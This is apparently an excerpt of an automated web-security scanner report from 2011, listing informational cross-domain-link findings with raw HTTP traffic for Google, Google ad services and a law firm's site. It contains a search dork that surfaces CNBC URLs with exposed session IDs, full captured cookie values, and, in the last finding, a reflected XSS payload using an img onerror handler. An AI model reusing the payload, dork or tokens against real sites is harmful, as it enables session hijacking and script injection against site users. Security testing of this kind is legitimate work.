<h3 class="r"><a href="http://www.dailymail.co.uk/news/article-2015461/News-World-phone-hacking-Why-did-Prince-Williams-lawyers-hide-evidence.html" class=l onmousedown="return clk(this,this.href,'','','','13','','0CG0QFjAM')">News of the World phone hacking: Why did Prince William&#39;s lawyers <b>
...[SNIP]...
<h3 class="r"><a href="http://www.thefirstpost.co.uk/83167,news-comment,news-politics,clive-goodman-letter-is-harbottle-lewis-letter-also-raises-questions-phone-hacking" class=l onmousedown="return clk(this,this.href,'','','','14','','0CHIQFjAN')">Clive Goodman letter and <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:L_hACEh7fecJ:www.thefirstpost.co.uk/83167,news-comment,news-politics,clive-goodman-letter-is-harbottle-lewis-letter-also-raises-questions-phone-hacking+Harbottle+%26+Lewis&amp;cd=14&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:L_hACEh7fecJ:www.thefirstpost.co.uk/83167,news-comment,news-politics,clive-goodman-letter-is-harbottle-lewis-letter-also-raises-questions-phone-hacking+Harbottle+%26+Lewis&cd=14&hl=en&ct=clnk&gl=us','','','','14','','0CHQQIDAN')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bloomberg.com/news/2011-07-22/harbottle-lewis-under-investigation-in-phone-hacking-case-2-.html" class=l onmousedown="return clk(this,this.href,'','','','15','','0CHgQFjAO')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:9HzOMndr5xsJ:www.bloomberg.com/news/2011-07-22/harbottle-lewis-under-investigation-in-phone-hacking-case-2-.html+Harbottle+%26+Lewis&amp;cd=15&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:9HzOMndr5xsJ:www.bloomberg.com/news/2011-07-22/harbottle-lewis-under-investigation-in-phone-hacking-case-2-.html+Harbottle+%26+Lewis&cd=15&hl=en&ct=clnk&gl=us','','','','15','','0CHoQIDAO')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/harbottle-&amp;-lewis" class=l onmousedown="return clk(this,this.href,'','','','16','','0CH4QFjAP')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:oAI0NchODmAJ:www.linkedin.com/company/harbottle-%26-lewis+Harbottle+%26+Lewis&amp;cd=16&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:oAI0NchODmAJ:www.linkedin.com/company/harbottle-%26-lewis+Harbottle+%26+Lewis&cd=16&hl=en&ct=clnk&gl=us','','','','16','','0CIABECAwDw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/pages/Harbottle-Lewis/108207205869774" class=l onmousedown="return clk(this,this.href,'','','','17','','0CIQBEBYwEA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:N52afrSeJL0J:www.facebook.com/pages/Harbottle-Lewis/108207205869774+Harbottle+%26+Lewis&amp;cd=17&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:N52afrSeJL0J:www.facebook.com/pages/Harbottle-Lewis/108207205869774+Harbottle+%26+Lewis&cd=17&hl=en&ct=clnk&gl=us','','','','17','','0CIYBECAwEA')">Cached</a>
...[SNIP]...
<div><a href="http://www.olswang.com/" class=l onmousedown="return clk(this,this.href,'','','','18','','0CIsBEKIIMBE')">Olswang</a>
...[SNIP]...
<div><a href="http://www.clintons.co.uk/" class=l onmousedown="return clk(this,this.href,'','','','19','','0CI0BEKIIMBI')">Clintons</a>
...[SNIP]...
<div><a href="http://www.wedlakebell.com/" class=l onmousedown="return clk(this,this.href,'','','','20','','0CI8BEKIIMBM')">Wedlake Bell</a>
...[SNIP]...
<div><a href="http://www.incelaw.com/" class=l onmousedown="return clk(this,this.href,'','','','21','','0CJEBEKIIMBQ')">Ince and Co</a>
...[SNIP]...

19.100. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=site%3Acnbc.com+JSESSIONID HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:13:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 102810

<!doctype html> <head> <title>site:cnbc.com JSESSIONID - Google Search</title> <script>window.google={kEI:"tDhmToK0BcfciAKMtYzGCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAtt
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=site:cnbc.com+JSESSIONID&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&amp;phrase=Options+Action+Web+Extra" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&phrase=Options+Action+Web+Extra','','','','1','','0CBoQFjAA')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:8WxAEA7fJFEJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D11B292CC4219086DCD47B8876891F233%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%253D%253D%26phrase%3DOptions%2BAction%2BWeb%2BExtra+site:cnbc.com+JSESSIONID&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:8WxAEA7fJFEJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D11B292CC4219086DCD47B8876891F233%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%253D%253D%26phrase%3DOptions%2BAction%2BWeb%2BExtra+site:cnbc.com+JSESSIONID&cd=1&hl=en&ct=clnk&gl=us','','','','1','','0CBwQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&amp;phrase=Investments+for+High+Net+Worth" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&phrase=Investments+for+High+Net+Worth','','','','2','','0CCAQFjAB')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:em0gqyNNO08J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D985047FA11137241E01F938A1DBC0957%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%253D%253D%26phrase%3DInvestments%2Bfor%2BHigh%2BNet%2BWorth+site:cnbc.com+JSESSIONID&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:em0gqyNNO08J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D985047FA11137241E01F938A1DBC0957%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%253D%253D%26phrase%3DInvestments%2Bfor%2BHigh%2BNet%2BWorth+site:cnbc.com+JSESSIONID&cd=2&hl=en&ct=clnk&gl=us','','','','2','','0CCIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&amp;phrase=Fundraiser-in-Chief" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&phrase=Fundraiser-in-Chief','','','','3','','0CCYQFjAC')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:SfXHZFTE3k4J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DB55B909145331242FF6DF4FCC879CCA8%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%253D%253D%26phrase%3DFundraiser-in-Chief+site:cnbc.com+JSESSIONID&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:SfXHZFTE3k4J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DB55B909145331242FF6DF4FCC879CCA8%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%253D%253D%26phrase%3DFundraiser-in-Chief+site:cnbc.com+JSESSIONID&cd=3&hl=en&ct=clnk&gl=us','','','','3','','0CCgQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&amp;phrase=Soft+Landing+or+Hard+Landing+for+China%3F" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&phrase=Soft+Landing+or+Hard+Landing+for+China%3F','','','','4','','0CCwQFjAD')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:xCZvBCIia04J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D88BAFCA8CD8211717C40DEEB8444A8AC%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%253D%253D%26phrase%3DSoft%2BLanding%2Bor%2BHard%2BLanding%2Bfor%2BChina%253F+site:cnbc.com+JSESSIONID&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:xCZvBCIia04J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D88BAFCA8CD8211717C40DEEB8444A8AC%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%253D%253D%26phrase%3DSoft%2BLanding%2Bor%2BHard%2BLanding%2Bfor%2BChina%253F+site:cnbc.com+JSESSIONID&cd=4&hl=en&ct=clnk&gl=us','','','','4','','0CC4QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&amp;phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst','','','','5','','0CDIQFjAE')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:X_00EaoXOEwJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DF106A5792CA8BDD181F1F225115A4E13%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%253D%253D%26phrase%3DJoint%2BEU-IMF%2BAid%2BMay%2BNot%2BBe%2BAll%2BThat%2BGreat%253A%2BAnalyst+site:cnbc.com+JSESSIONID&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:X_00EaoXOEwJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DF106A5792CA8BDD181F1F225115A4E13%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%253D%253D%26phrase%3DJoint%2BEU-IMF%2BAid%2BMay%2BNot%2BBe%2BAll%2BThat%2BGreat%253A%2BAnalyst+site:cnbc.com+JSESSIONID&cd=5&hl=en&ct=clnk&gl=us','','','','5','','0CDQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&amp;phrase=Alcoa+Earnings+Reaction" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&phrase=Alcoa+Earnings+Reaction','','','','6','','0CDgQFjAF')">Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:FdhCl3P1wEsJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D639562A329F750EF6CECEF52850FF058%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%253D%253D%26phrase%3DAlcoa%2BEarnings%2BReaction+site:cnbc.com+JSESSIONID&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:FdhCl3P1wEsJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D639562A329F750EF6CECEF52850FF058%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%253D%253D%26phrase%3DAlcoa%2BEarnings%2BReaction+site:cnbc.com+JSESSIONID&cd=6&hl=en&ct=clnk&gl=us','','','','6','','0CDoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&amp;phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer','','','','7','','0CD4QFjAG')">Remove - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:MXNjqSbiM0oJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DDED5E23C761652B8ED8438990C240549%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%253D%253D%26phrase%3DTalking%2BNumbers%253A%2BCashing%2Bin%2Bon%2Bthe%2BConsumer+site:cnbc.com+JSESSIONID&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:MXNjqSbiM0oJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DDED5E23C761652B8ED8438990C240549%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%253D%253D%26phrase%3DTalking%2BNumbers%253A%2BCashing%2Bin%2Bon%2Bthe%2BConsumer+site:cnbc.com+JSESSIONID&cd=7&hl=en&ct=clnk&gl=us','','','','7','','0CEAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&amp;phrase=Muni+Bonds%3A+Time+to+Buy%3F&amp;page=0" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&phrase=Muni+Bonds%3A+Time+to+Buy%3F&page=0','','','','8','','0CEQQFjAH')">Add to Cart - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:f7VLmaz0zi4J:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D0B47155A9D65A891A3246272A37765AB%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%253D%253D%26phrase%3DMuni%2BBonds%253A%2BTime%2Bto%2BBuy%253F%26page%3D0+site:cnbc.com+JSESSIONID&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:f7VLmaz0zi4J:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D0B47155A9D65A891A3246272A37765AB%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%253D%253D%26phrase%3DMuni%2BBonds%253A%2BTime%2Bto%2BBuy%253F%26page%3D0+site:cnbc.com+JSESSIONID&cd=8&hl=en&ct=clnk&gl=us','','','','8','','0CEYQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&amp;phrase=Eye+on+Europe&#39;s+Economy&amp;page=1" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&phrase=Eye+on+Europe\'s+Economy&page=1','','','','9','','0CEoQFjAI')">Add to Cart - Shopping Cart</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:KAqXj9MU2ogJ:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D93C40ADFE94CC07D57F86DD9E23EF04B%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%253D%253D%26phrase%3DEye%2Bon%2BEurope&#39;s%2BEconomy%26page%3D1+site:cnbc.com+JSESSIONID&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:KAqXj9MU2ogJ:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D93C40ADFE94CC07D57F86DD9E23EF04B%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%253D%253D%26phrase%3DEye%2Bon%2BEurope\'s%2BEconomy%26page%3D1+site:cnbc.com+JSESSIONID&cd=9&hl=en&ct=clnk&gl=us','','','','9','','0CEwQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/search.action;jsessionid=B2F5063C1050C7893BD8840513A5ABB2?phrase=Commodity+Price+Check" class=l onmousedown="return clk(this,this.href,'','','','10','','0CFAQFjAJ')">Clips about Commodity Price Check - Video Reprints - CNBC.com</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:681MsvVQ1sYJ:videoreprints.cnbc.com/search.action%3Bjsessionid%3DB2F5063C1050C7893BD8840513A5ABB2%3Fphrase%3DCommodity%2BPrice%2BCheck+site:cnbc.com+JSESSIONID&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:681MsvVQ1sYJ:videoreprints.cnbc.com/search.action%3Bjsessionid%3DB2F5063C1050C7893BD8840513A5ABB2%3Fphrase%3DCommodity%2BPrice%2BCheck+site:cnbc.com+JSESSIONID&cd=10&hl=en&ct=clnk&gl=us','','','','10','','0CFIQIDAJ')">Cached</a>
...[SNIP]...

19.101. http://www.googleadservices.com/pagead/conversion/1071435827/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1071435827/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pagead/conversion/1071435827/?random=1315341856992&cv=6&fst=1315341856992&num=1&fmt=1&value=0&label=KhpeCOWsqgEQs6Dz_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.netsuite.com/portal/home.shtml&url=http%3A//www.netsuite.com/portal/products/netsuite/financials/main.shtml HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoQBQ2xkUnY1VHhtVHNOeHBiT0lBcVcyMklrUHo4VHA4QUgzbGNTakdMbnBnQWNRQXlnSVVQSGF4NWdCWU1tZV9vYklvX3dhb0FHem9QUC1BOGdCQWFvRUlrX1FYYVQ2c3ZSajdxUEFDRGpiSUJBY3NoQlI1OFNMaHJJalpNWmJ2blloc044EhMIzKi_wPiIqwIVIEKDCh1GdcvMGAAgvsDK96bSyISEAUgB

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: PREF=; Max-Age=0; Path=/; Version=1; Domain=.www.googleadservices.com
Date: Tue, 06 Sep 2011 15:44:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071435827/?random=1315341856992&cv=6&fst=1315341856992&num=1&fmt=1&value=0&label=KhpeCOWsqgEQs6Dz_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.netsuite.com/portal/home.shtml&url=http%3A//www.netsuite.com/portal/products/netsuite/financials/main.shtml&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 381
X-XSS-Protection: 1; mode=block

<html><body bgcolor="#666666" link="#FFFFFF" alink="#FFFFFF" vlink="#FFFFFF" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#FFFFFF">Google Site Stats - <a href="https://services.google.com/sitestats/en_US.html?cid=1071435827" target="_blank">learn more</a>
...[SNIP]...

19.102. http://www.harbottle.com/hnl/pages/hnl.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /hnl/pages/hnl.php?gclid= HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Harbottle+%26+Lewis
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 13666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.103. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
